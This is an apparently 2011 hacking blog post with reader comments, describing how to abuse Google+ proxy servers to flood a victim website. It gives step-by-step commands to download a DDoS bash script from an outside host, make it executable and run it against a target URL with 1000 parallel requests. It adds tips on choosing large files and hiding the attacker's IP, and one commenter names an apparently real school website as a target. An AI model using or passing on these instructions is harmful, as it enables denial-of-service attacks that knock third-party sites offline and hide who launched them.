Recently we wrote about ApacheKiller that freezes Victim Server in seconds. While this new findings by IHTeam express that Google+ Servers can be use for DDoS attack. Lets talk about this ant script, Hey.. but it is worthy π
How DDoS Attack Using Google+ Servers works?
When you post a URL on your Google+ status it fetches URL Summary (It includes Image + Short description) using Google+ Proxy Servers.
Advisory report says;Β vulnerable pages are β/_/sharebox/linkpreview/β Β and βgadgets/proxy?β
So if you send multiple parallel requests with a big number e.g 1000 that can be turn into DDoS attack using Google+ Servers huge bandwidth.
How to use DDoS script to launch a DDoS attack Using Google+ Servers?
Download :
wget static.hackersgarage.com/ddos-using-google-servers.sh.hackersgarage.com
Make it shorter :
mv ddos-using-google-servers.sh.hackersgarage.com ddos.sh
Make it executable :
chmod u+x ddos.sh
Example of Usage :
./ddos.sh http://www.victim-website.com/some-file-url/file-name.mp3 1000
Now, lets look at this example :
It is recommended to find a full path to some big file which is downloadable without requesting for CAPTCHA.
e.g http://www.victim-website.com/some-file-url/file-name.mp3
NOTE : Make sure your workstation is capable to handle this huge number else your workstation will freeze and you will have to force fully restart your own workstation π
e.g 1000Β is very big number.
You will see anonymous source instead of Real Source IP:
See sample apache webserver log below
209.85.228.85 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.226.88 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.228.90 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.226.91 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.226.81 - - [31/Aug/2011:15:34:18 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 209.85.228.86 - - [31/Aug/2011:15:34:17 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 74.125.152.84 - - [31/Aug/2011:15:34:21 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)" 74.125.152.81 - - [31/Aug/2011:15:34:33 +0000] "GET /madona-song.mp3 HTTP/1.1" 200 636431 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
You can also access it in browser to remain anonymous using below example URL (replace URL with your own choice) :
https://images1-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://www.Hackersgarage.com&container=none
If you have any question or unable to run this, Feel free to write us π
3 replies on “Launch DDoS Attack Using Google Servers with +DDoS Bash Script”
I don’t understand how to do this I only want to to know for personal reasons I tried to ddos attack my own website and I haven’t been able to how do I do this can you make it more simpler thanks guys.
can you help me… i dont understand it… i post it on google + what then pls make it simpler
./ddos.sh os-zamet-ri.skole.hr/wp-content/uploads/2012/01/IMG_0653.jpg 1000 ?
This no longer works. In access.log it shows your IP, not google’s any more. I tested this against my own webserver.